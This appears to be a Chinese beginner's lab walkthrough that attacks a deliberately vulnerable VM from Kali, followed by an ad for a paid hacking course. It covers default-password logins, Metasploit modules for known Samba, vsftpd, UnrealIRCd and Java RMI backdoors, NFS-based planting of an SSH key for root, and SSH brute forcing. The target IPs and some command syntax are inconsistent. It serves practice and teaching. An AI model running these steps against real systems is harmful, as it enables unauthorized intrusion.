小白黑客是如何進行漏洞攻防演練的

一、系統弱密碼登入

1、在kali上執行命令列telnet 192.168.26.129

2、Login和password都輸入msfadmin

3、登入成功,進入系統

4、測試如下:

二、MySQL弱密碼登入:

1、在kali上執行mysql –h 192.168.26.129 –u root

2、登入成功,進入MySQL系統

3、測試效果:

三、PostgreSQL弱密碼登入

1、在Kali上執行psql -h 192.168.26.129 –U postgres

2、輸入密碼:postgres

3、登入成功,進入postgresql系統

測試效果

四、VNC弱密碼登入

1、在kali圖形介面的終端中執行vncviewer 192.168.26.129

2、輸入密碼 password

3、登入成功,進入系統

測試效果:

五、Samba MS-RPC Shell 命令注入漏洞

利用步驟

1.在kali中執行msfconsole,啟動metasploit

2.Use
   exploit/multi/samba/usermap_script,選擇漏洞庫

3.Set RHOST 192.168.160.131 設定要攻擊的機器IP

4.Exploit,開始攻擊

5.利用成功,執行uname –a 驗證

測試效果:

六、Vsftpd原始碼包後門漏洞

步驟

1、在kali中執行msfconsole,啟動metasploit

2、use
   exploit/unix/ftp/vsftpd_234_backdoor,選擇漏洞

3、set RHOST 192.168.160.131

4、利用成功,執行uname –a 驗證

5、測試過程:

七、UnreallRCd後門漏洞

步驟

1、在kali中執行msfconsole,啟動metasploit

2、use
   exploit/unix/irc/unreal_ircd_3281_backdoor,選擇漏洞

set RHOST 192.168.160.131 ,設定要攻擊的目標IP地址

3、開始攻擊

4、利用成功!使用uname –a 驗證

測試效果:

  1. Linux NFS共享目錄配置漏洞

問題:在(2)中需要建立 /tmp/test目錄並在目錄下建立,如未建立則不能進行下一步

步驟

  1. 在kali上執行命令rpcinfo –p 192.168.26.129 ,檢視nfs服務有無開啟
  2. showmount –e 192.168.26.129 檢視其設定的遠端目錄列表
  3. 輸入ssh-keygen 生成RSA公鑰
  4. 依次輸入:

(1)mount –t nfs 192.168.26.129://tmp/test(預先建立),把192.168.160.131的根目錄掛載到/tmp/test/下;

注:如果提示下圖中錯誤則需要/etc/init.d/rpcbind start 來啟動mount

(2)cat /root/.ssh/id_rsa.pub>>
   /tmp/test/root/.ssh/authorized_keys,把生成的公鑰追加到靶機的authorized_keys下:

(3)ssh [email protected],實現無密碼登入

  1. Java RMI SERVER 命令執行漏洞(1099/tcp)

1.Nmap –p 0-65535 192.168.160.131 來檢視1099埠是否開啟

2.進入msfconsole框架,依次輸入以下命令:

1)use exploit/multi/misc/java_rmi_server

2)set RHOST 192.168.26.129(靶機的IP地址)

3)run

4)session

5)shell(進入meterpreter時執行)

十、Root使用者弱口令漏洞(SSH爆破)

步驟

  1. 輸入nmap –sV -O(大寫) 192.168.160.131 檢視SSh埠是否開啟
  2. 開啟metasploit framework 框架,依次輸入:
  • use auxiliary/scanner/ssh/ssh_login
  • set RHOSTS 192.168.160.131
  • set USERNAME root
  • set PASS_FILE pass.txt(字典檔案,需要預先生成)
  • set THREADS 50
  • run

       
專欄
1個月掌握Kali滲透與黑客程式設計
作者:Kali與程式設計
188幣
269人已購
檢視